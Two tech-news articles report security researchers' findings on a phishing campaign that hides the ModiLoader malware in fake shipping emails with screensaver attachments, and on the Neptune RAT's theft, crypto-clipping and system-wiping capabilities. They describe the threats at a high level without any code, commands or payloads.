Hackers Disguise Malware As Screensaver Files In Fake Shipping Email Attack - 1

Image by jcomp, from Freepik

Hackers Disguise Malware As Screensaver Files In Fake Shipping Email Attack

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

Cybersecurity firm Symantec has uncovered a phishing campaign targeting industries across Asia, Europe, and the U.S., using fake shipping emails and disguised screensaver files to infect victims with malware.

In a rush? Here are the quick facts:

  • The ModiLoader tool deploys stealers including Remcos and Agent Tesla and AsyncRAT.
  • The emails pretend to be official communications from a prominent Taiwanese freight company that provides shipping updates.
  • The attack targets four specific sectors which include electronics together with automotive and manufacturing and broadcasting.

Attackers pretend to be a major Taiwanese freight and logistics company and send phishing emails in Chinese that look like real shipment updates. The subject line includes detailed shipping info, referencing customs clearance from Kaohsiung to Atlanta on April 7.

The recipients are subsequently asked to verify shipping documents like the ISF, packing list, and invoice. Inside is a malicious file disguised as a Windows screensaver (.SCR). When clicked, it silently installs a malware loader called ModiLoader.

GBHackers notes that the ModiLoader is a known threat that downloads and installs remote access tools and information stealing malware. Symantec has reported that it has been used to drop malware like Remcos, Agent Tesla, MassLogger, AsyncRAT and Formbook.

“While they might appear harmless, they are essentially executable programs with a different file extension. Once executed, these files can perform any action a regular executable can—such as installing loaders, backdoors, keyloggers, or ransomware. As of today, they continue to be heavily used in attack chains,’’ warned Symantec.

The campaign has affected multiple sectors including automotive, electronics, publishing, broadcasting, and manufacturing, and the victims are located in countries such as Japan, the UK, Sweden, the U.S., Hong Kong, Taiwan, Thailand, and Malaysia.

Symantec is fighting the threat by using a variety of protections including machine learning, file scanning, email filtering, and Carbon Black endpoint security. The malware has been flagged under multiple names including Trojan.Gen.MBT and Scr.Malcode!gen19.

Experts urge businesses to educate employees about suspicious emails.

Hackers Use Neptune RAT to Spy, Steal, and Wipe Victim Computers - 2

Image by Drazen Zigic, from Freepik

Hackers Use Neptune RAT to Spy, Steal, and Wipe Victim Computers

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

A dangerous new version of Neptune RAT, a powerful Remote Access Trojan (RAT), has been discovered by cybersecurity researchers at CYFIRMA . This malware can steal passwords, hijack cryptocurrency transactions, spy on victims in real time, and even destroy Windows systems.

In a rush? Here are the quick facts:

  • It steals passwords from 270+ apps, including Chrome and Brave.
  • The malware swaps crypto wallet addresses to hijack transactions.
  • It disables antivirus software and corrupts system files to avoid detection.

The malware is being spread on GitHub, Telegram, and YouTube, often advertised as the “Most Advanced RAT.” Attackers use PowerShell commands to download and execute the malware.

Attackers use a harmful script located on catbox.moe to perform silent downloads and executions. The victim’s AppData folder receives Neptune RAT installation which establishes remote server connections that give attackers complete control of infected machines.

The Neptune RAT poses a significant threat because it includes a range of capabilities. It’s able to steal passwords and extract login information from over 270 applications — including popular web browsers like Chrome, Opera, and Brave.

It also functions as a crypto clipper, replacing copied cryptocurrency wallet addresses with the attacker’s own to hijack transactions. In more extreme cases, it operates as ransomware, encrypting files and demanding Bitcoin payments for their release.

The malware can even monitor the victim’s screen in real time, and in severe attacks, it can corrupt the Master Boot Record (MBR), making the system unbootable. It also disables antivirus software upon installation to avoid detection.

Neptune RAT remains hidden through code obfuscation methods. These include Arabic text and emojis, which makes it harder for researchers to analyze its programming. Additionally, the malware includes anti-virtual machine protection, which activates shutdown procedures when it detects analysis activities.

According to CYFIRMA, malware’s creator, who goes by the name “Mason Team,” has uploaded demonstrations on YouTube and offers a free version of Neptune RAT on GitHub. The research reports that the developer claims to be a Moscow-born coder currently residing in Saudi Arabia, with public Discord and YouTube activity linked to the malware’s development.